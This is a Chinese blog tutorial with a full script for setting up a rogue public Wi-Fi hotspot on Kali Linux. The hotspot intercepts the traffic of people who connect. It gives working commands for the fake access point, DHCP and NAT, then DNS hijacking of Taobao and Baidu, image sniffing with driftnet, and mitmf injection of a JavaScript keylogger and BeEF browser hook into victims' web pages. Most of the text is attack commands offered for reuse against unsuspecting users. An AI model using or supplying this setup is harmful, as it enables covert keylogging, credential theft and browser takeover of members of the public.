【邪影教程】利用kali做公共WIFI钓鱼热点

2015-09-23 01:58:47 -0400
【邪影教程】邪影
从至少一年前我就一直想在自己跑kali的笔记本上架个钓鱼热点。然而由于网上的教程的nat写得有问题,别人写好的脚本和我电脑有些互不待见,最接近成功的一次只做到了qq能聊天,百度都上不去。
邪影官网http://xieying.wodemo.com
而最近忽然意识到了问题的所在,成功实现了建立wifi热点,dns劫持,js注入,图片嗅探,和BEEF结合对用户浏览器进行攻击测试。

故写此文分享给大家,希望与之前的我有一样困惑的同志们能有所收获。

建立热点

工具:isc-dhcp-server ;Aircrack-ng套件;iptables

建立过程:

首先写dhcp配置文件/etc/dhcp/dhcpd.conf

写入如下内容:

<span class="pln">authoritative</span><span class="pun">;</span><span class="pln">

default</span><span class="pun">-</span><span class="pln">lease</span><span class="pun">-</span><span class="pln">time </span><span class="lit">700</span><span class="pun">;</span><span class="pln">
max</span><span class="pun">-</span><span class="pln">lease</span><span class="pun">-</span><span class="pln">time </span><span class="lit">8000</span><span class="pun">;</span><span class="pln">

subnet </span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.0</span><span class="pln"> netmask </span><span class="lit">255.255</span><span class="pun">.</span><span class="lit">255.0</span><span class="pln"> </span><span class="pun">{</span><span class="pln">
option routers </span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.1</span><span class="pun">;</span><span class="pln">
option subnet</span><span class="pun">-</span><span class="pln">mask </span><span class="lit">255.255</span><span class="pun">.</span><span class="lit">255.0</span><span class="pun">;</span><span class="pln">

option domain</span><span class="pun">-</span><span class="pln">name</span><span class="pun">-</span><span class="pln">servers </span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.1</span><span class="pun">;</span><span class="pln">

range </span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.10</span><span class="pln"> </span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.100</span><span class="pun">;</span>

<span class="pun">}</span>
这里以10.0.0.1作为网关和dns服务器地址。

然后我们处理无线网卡

<span class="pln">ifconfig wlan1 down </span><span class="com">#wlan1修改成你的网卡</span><span class="pln">
iwconfig wlan1 mode monitor
ifconfig wlan1 up
airmon</span><span class="pun">-</span><span class="pln">ng start wlan1</span>
上述命令可以防止出现:Error: Got channel -1, expected a value > 0.

然后用airbase建立热点

<span class="pln">airbase</span><span class="pun">-</span><span class="pln">ng </span><span class="pun">-</span><span class="pln">e </span><span class="typ">Fishing</span><span class="pln"> </span><span class="pun">-</span><span class="pln">c </span><span class="lit">11</span><span class="pln"> mon0</span>
热点的网络流量会被虚拟到at0这块网卡上面

<span class="pln">ifconfig at0 up
ifconfig at0 </span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.1</span><span class="pln"> netmask </span><span class="lit">255.255</span><span class="pun">.</span><span class="lit">255.0</span><span class="pln">
route add </span><span class="pun">-</span><span class="pln">net </span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.0</span><span class="pln"> netmask </span><span class="lit">255.255</span><span class="pun">.</span><span class="lit">255.0</span><span class="pln"> gw </span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.1</span>
打开ip转发

<span class="pln">echo </span><span class="lit">1</span><span class="pln"> </span><span class="pun">&gt;</span><span class="pln"> </span><span class="pun">/</span><span class="pln">proc</span><span class="pun">/</span><span class="pln">sys</span><span class="pun">/</span><span class="pln">net</span><span class="pun">/</span><span class="pln">ipv4</span><span class="pun">/</span><span class="pln">ip_forward</span>
开启dhcp

<span class="pln">dhcpd </span><span class="pun">-</span><span class="pln">cf </span><span class="pun">/</span><span class="pln">etc</span><span class="pun">/</span><span class="pln">dhcp</span><span class="pun">/</span><span class="pln">dhcpd</span><span class="pun">.</span><span class="pln">conf </span><span class="pun">-</span><span class="pln">pf </span><span class="pun">/</span><span class="pln">var</span><span class="pun">/</span><span class="pln">run</span><span class="pun">/</span><span class="pln">dhcpd</span><span class="pun">.</span><span class="pln">pid at0
service isc</span><span class="pun">-</span><span class="pln">dhcp</span><span class="pun">-</span><span class="pln">server start</span>
然后可以试着用手机连接,应该可以连上但上不了网

于是配置NAT

<span class="pln">iptables </span><span class="pun">-</span><span class="pln">t nat </span><span class="pun">-</span><span class="pln">A POSTROUTING </span><span class="pun">-</span><span class="pln">o eth0 </span><span class="pun">-</span><span class="pln">j MASQUERADE </span><span class="com">#对eth0进行源nat</span><span class="pln">
iptables </span><span class="pun">-</span><span class="pln">A FORWARD </span><span class="pun">-</span><span class="pln">i wlan1 </span><span class="pun">-</span><span class="pln">o eth0 </span><span class="pun">-</span><span class="pln">j ACCEPT </span><span class="com">#把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面</span><span class="pln">
iptables </span><span class="pun">-</span><span class="pln">A FORWARD </span><span class="pun">-</span><span class="pln">p tcp </span><span class="pun">--</span><span class="pln">syn </span><span class="pun">-</span><span class="pln">s </span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.0</span><span class="pun">/</span><span class="lit">24</span><span class="pln"> </span><span class="pun">-</span><span class="pln">j TCPMSS </span><span class="pun">--</span><span class="kwd">set</span><span class="pun">-</span><span class="pln">mss </span><span class="lit">1356</span><span class="pln"> </span><span class="com">#修改最大报文段长度</span>
注意那第三个命令调整MSS,不加后果很严重(我就一直死在这里)

(这里可能还是DNS错误,请看后文中的dns代理服务器搭建)

劫持DNS

工具:dnschef

过程:

<span class="pln">dnschef </span><span class="pun">-</span><span class="pln">i </span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.1</span><span class="pln"> </span><span class="pun">--</span><span class="pln">nameserver </span><span class="lit">210.73</span><span class="pun">.</span><span class="lit">64.1</span><span class="com">#53</span>
上述命令是以ip10.0.0.1(上文中的fakeap网关和DNS的ip)建立dns,对于所有请求转发到210.73.64.1进行解析。显然这只是个“代理”并没有劫持的功效

于是我们进化:

<span class="pln">dnschef </span><span class="pun">--</span><span class="pln">fakedomains</span><span class="pun">=</span><span class="pln">taobao</span><span class="pun">.</span><span class="pln">com</span><span class="pun">,</span><span class="pln">baidu</span><span class="pun">.</span><span class="pln">com </span><span class="pun">--</span><span class="pln">fakeip</span><span class="pun">=</span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.1</span><span class="pln"> </span><span class="pun">-</span><span class="pln">i </span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.1</span><span class="pln"> </span><span class="pun">--</span><span class="pln">nameserver </span><span class="lit">210.73</span><span class="pun">.</span><span class="lit">64.1</span><span class="com">#53</span>
把淘宝和百度解析到本机了。

利用Kali进行WiFi钓鱼测试实战

当然可以把更多规则写在文件里:

利用Kali进行WiFi钓鱼测试实战

剩下的大家自由发挥吧。

p.s:这个和后文中mitmf冲突,mitmf识别http协议中的目的主机,进行转发,不受这个dns伪造影响。

图片嗅探

这是一个很好玩的功能

工具:driftnet

过程:

<span class="pln">driftnet </span><span class="pun">-</span><span class="pln">i at0</span>
然后程序会打开一个小窗口显示所有传输的图片:

利用Kali进行WiFi钓鱼测试实战

单击图片保存到/

当然可以开启 Adjunct mode:

<span class="pln">driftnet </span><span class="pun">-</span><span class="pln">i at0 </span><span class="pun">-</span><span class="pln">a</span>
直接保存图片并显示文件名。

利用Kali进行WiFi钓鱼测试实战

劫持Web流量

这个更好玩

工具:BEEF;mitmf;iptables

过程:

先把80端口的流量劫持走(这里10000是mitmf默认监听端口)

<span class="pln">iptables </span><span class="pun">-</span><span class="pln">t nat </span><span class="pun">-</span><span class="pln">A PREROUTING </span><span class="pun">-</span><span class="pln">p tcp </span><span class="pun">--</span><span class="pln">destination</span><span class="pun">-</span><span class="pln">port </span><span class="lit">80</span><span class="pln"> </span><span class="pun">-</span><span class="pln">j REDIRECT </span><span class="pun">--</span><span class="pln">to</span><span class="pun">-</span><span class="pln">port </span><span class="lit">10000</span>
然后打开mitmf

<span class="pln">mitmf </span><span class="pun">-</span><span class="pln">i at0 </span><span class="pun">--</span><span class="pln">replace </span><span class="pun">--</span><span class="pln">search</span><span class="pun">-</span><span class="pln">str aaaaa </span><span class="pun">--</span><span class="pln">replace</span><span class="pun">-</span><span class="pln">str bbbbb</span><span class="com">#把所有网页中的aaaaa替换成bbbbb</span>
利用Kali进行WiFi钓鱼测试实战

上图百度了aaaaa

好吧不要恶作剧了,上干货

<span class="pln">mitmf </span><span class="pun">-</span><span class="pln">i at0 </span><span class="pun">--</span><span class="pln">inject </span><span class="pun">--</span><span class="pln">js</span><span class="pun">-</span><span class="pln">url http</span><span class="pun">://</span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.1</span><span class="pun">:</span><span class="lit">3000</span><span class="pun">/</span><span class="pln">hook</span><span class="pun">.</span><span class="pln">js </span><span class="pun">--</span><span class="pln">jskeylogger</span>
mitmf在这里注入了js键盘记录器

利用Kali进行WiFi钓鱼测试实战

和beef的攻击测试脚本,其余的攻击方式(比如javapwn)可以参考http://www.freebuf.com/tools/45796.html

最后用BEEF测试用户浏览器吧!

<span class="pun">/</span><span class="pln">usr</span><span class="pun">/</span><span class="pln">share</span><span class="pun">/</span><span class="pln">beef</span><span class="pun">-</span><span class="pln">xss</span><span class="pun">/</span><span class="pln">beef</span>
浏览器打开http://127.0.0.1:3000/ui/panel ,初始用户名和密码都是beef

利用Kali进行WiFi钓鱼测试实战

BEEF过于高深我还没玩得很清楚请大家自行探索。对了,不要忘了抓包

最后是我写的脚本

利用Kali进行WiFi钓鱼测试实战

<span class="com">#清空iptables</span><span class="pln">
iptables </span><span class="pun">-</span><span class="pln">t nat </span><span class="pun">-</span><span class="pln">F
iptables </span><span class="pun">-</span><span class="pln">t nat </span><span class="pun">-</span><span class="pln">X
iptables </span><span class="pun">-</span><span class="pln">t nat </span><span class="pun">-</span><span class="pln">P PREROUTING ACCEPT
iptables </span><span class="pun">-</span><span class="pln">t nat </span><span class="pun">-</span><span class="pln">P POSTROUTING ACCEPT
iptables </span><span class="pun">-</span><span class="pln">t nat </span><span class="pun">-</span><span class="pln">P OUTPUT ACCEPT
iptables </span><span class="pun">-</span><span class="pln">t mangle </span><span class="pun">-</span><span class="pln">F
iptables </span><span class="pun">-</span><span class="pln">t mangle </span><span class="pun">-</span><span class="pln">X
iptables </span><span class="pun">-</span><span class="pln">t mangle </span><span class="pun">-</span><span class="pln">P PREROUTING ACCEPT
iptables </span><span class="pun">-</span><span class="pln">t mangle </span><span class="pun">-</span><span class="pln">P INPUT ACCEPT
iptables </span><span class="pun">-</span><span class="pln">t mangle </span><span class="pun">-</span><span class="pln">P FORWARD ACCEPT
iptables </span><span class="pun">-</span><span class="pln">t mangle </span><span class="pun">-</span><span class="pln">P OUTPUT ACCEPT
iptables </span><span class="pun">-</span><span class="pln">t mangle </span><span class="pun">-</span><span class="pln">P POSTROUTING ACCEPT
iptables </span><span class="pun">-</span><span class="pln">F
iptables </span><span class="pun">-</span><span class="pln">X
iptables </span><span class="pun">-</span><span class="pln">P FORWARD ACCEPT
iptables </span><span class="pun">-</span><span class="pln">P INPUT ACCEPT
iptables </span><span class="pun">-</span><span class="pln">P OUTPUT ACCEPT
iptables </span><span class="pun">-</span><span class="pln">t raw </span><span class="pun">-</span><span class="pln">F
iptables </span><span class="pun">-</span><span class="pln">t raw </span><span class="pun">-</span><span class="pln">X
iptables </span><span class="pun">-</span><span class="pln">t raw </span><span class="pun">-</span><span class="pln">P PREROUTING ACCEPT
iptables </span><span class="pun">-</span><span class="pln">t raw </span><span class="pun">-</span><span class="pln">P OUTPUT ACCEPT
</span><span class="com">#建立热点</span><span class="pln">
airmon</span><span class="pun">-</span><span class="pln">ng stop mon0
ifconfig wlan1 down </span><span class="com">#wlan1修改成你的网卡</span><span class="pln">
iwconfig wlan1 mode monitor
ifconfig wlan1 up
airmon</span><span class="pun">-</span><span class="pln">ng start wlan1 </span><span class="pun">&amp;</span><span class="pln">
sleep </span><span class="lit">2</span><span class="pln">
gnome</span><span class="pun">-</span><span class="pln">terminal </span><span class="pun">-</span><span class="pln">x bash </span><span class="pun">-</span><span class="pln">c </span><span class="str">"airbase-ng -e Fishing -c 11 mon0"</span><span class="pln"> </span><span class="com">#按需求修改</span><span class="pln">
sleep </span><span class="lit">2</span><span class="pln">
ifconfig at0 up
ifconfig at0 </span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.1</span><span class="pln"> netmask </span><span class="lit">255.255</span><span class="pun">.</span><span class="lit">255.0</span><span class="pln">
ifconfig at0 mtu </span><span class="lit">1400</span><span class="pln">
route add </span><span class="pun">-</span><span class="pln">net </span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.0</span><span class="pln"> netmask </span><span class="lit">255.255</span><span class="pun">.</span><span class="lit">255.0</span><span class="pln"> gw </span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.1</span><span class="pln">
echo </span><span class="lit">1</span><span class="pln"> </span><span class="pun">&gt;</span><span class="pln"> </span><span class="pun">/</span><span class="pln">proc</span><span class="pun">/</span><span class="pln">sys</span><span class="pun">/</span><span class="pln">net</span><span class="pun">/</span><span class="pln">ipv4</span><span class="pun">/</span><span class="pln">ip_forward
</span><span class="com">#配置dhcp</span><span class="pln">
dhcpd </span><span class="pun">-</span><span class="pln">cf </span><span class="pun">/</span><span class="pln">etc</span><span class="pun">/</span><span class="pln">dhcp</span><span class="pun">/</span><span class="pln">dhcpd</span><span class="pun">.</span><span class="pln">conf </span><span class="pun">-</span><span class="pln">pf </span><span class="pun">/</span><span class="pln">var</span><span class="pun">/</span><span class="pln">run</span><span class="pun">/</span><span class="pln">dhcpd</span><span class="pun">.</span><span class="pln">pid at0
sleep </span><span class="lit">2</span>
<span class="pun">/</span><span class="pln">etc</span><span class="pun">/</span><span class="pln">init</span><span class="pun">.</span><span class="pln">d</span><span class="pun">/</span><span class="pln">isc</span><span class="pun">-</span><span class="pln">dhcp</span><span class="pun">-</span><span class="pln">server start
</span><span class="com">#nat</span><span class="pln">
iptables </span><span class="pun">-</span><span class="pln">t nat </span><span class="pun">-</span><span class="pln">A POSTROUTING </span><span class="pun">-</span><span class="pln">o eth0 </span><span class="pun">-</span><span class="pln">j MASQUERADE
iptables </span><span class="pun">-</span><span class="pln">A FORWARD </span><span class="pun">-</span><span class="pln">i wlan1 </span><span class="pun">-</span><span class="pln">o eth0 </span><span class="pun">-</span><span class="pln">j ACCEPT
iptables </span><span class="pun">-</span><span class="pln">A FORWARD </span><span class="pun">-</span><span class="pln">p tcp </span><span class="pun">--</span><span class="pln">syn </span><span class="pun">-</span><span class="pln">s </span><span class="lit">10.0</span><span class="pun">.</span><span class="lit">0.0</span><span class="pun">/</span><span class="lit">24</span><span class="pln"> </span><span class="pun">-</span><span class="pln">j TCPMSS </span><span class="pun">--</span><span class="kwd">set</span><span class="pun">-</span><span class="pln">mss </span><span class="lit">1356</span>
<span class="com">#劫持80</span><span class="pln">
iptables </span><span class="pun">-</span><span class="pln">t nat </span><span class="pun">-</span><span class="pln">A PREROUTING </span><span class="pun">-</span><span class="pln">p tcp </span><span class="pun">--</span><span class="pln">destination</span><span class="pun">-</span><span class="pln">port </span><span class="lit">80</span><span class="pln"> </span><span class="pun">-</span><span class="pln">j REDIRECT </span><span class="pun">--</span><span class="pln">to</span><span class="pun">-</span><span class="pln">port </span><span class="lit">10000</span>
<span class="com">#劫持dns</span><span class="pln">
gnome</span><span class="pun">-</span><span class="pln">terminal </span><span class="pun">-</span><span class="pln">x bash </span><span class="pun">-</span><span class="pln">c </span><span class="str">"dnschef -i 10.0.0.1 --nameserver 210.73.64.1#53"</span>

<span class="com">#打开beef并进行80js键盘记录</span><span class="pln">
gnome</span><span class="pun">-</span><span class="pln">terminal </span><span class="pun">-</span><span class="pln">x bash </span><span class="pun">-</span><span class="pln">c </span><span class="str">"mitmf -i at0 --inject --js-url http://10.0.0.1:3000/hook.js --jskeylogger"</span><span class="pln">
beef</span><span class="pun">-</span><span class="pln">xss</span>
«Newer      Older»

Back to home

Subscribe | Register | Login | N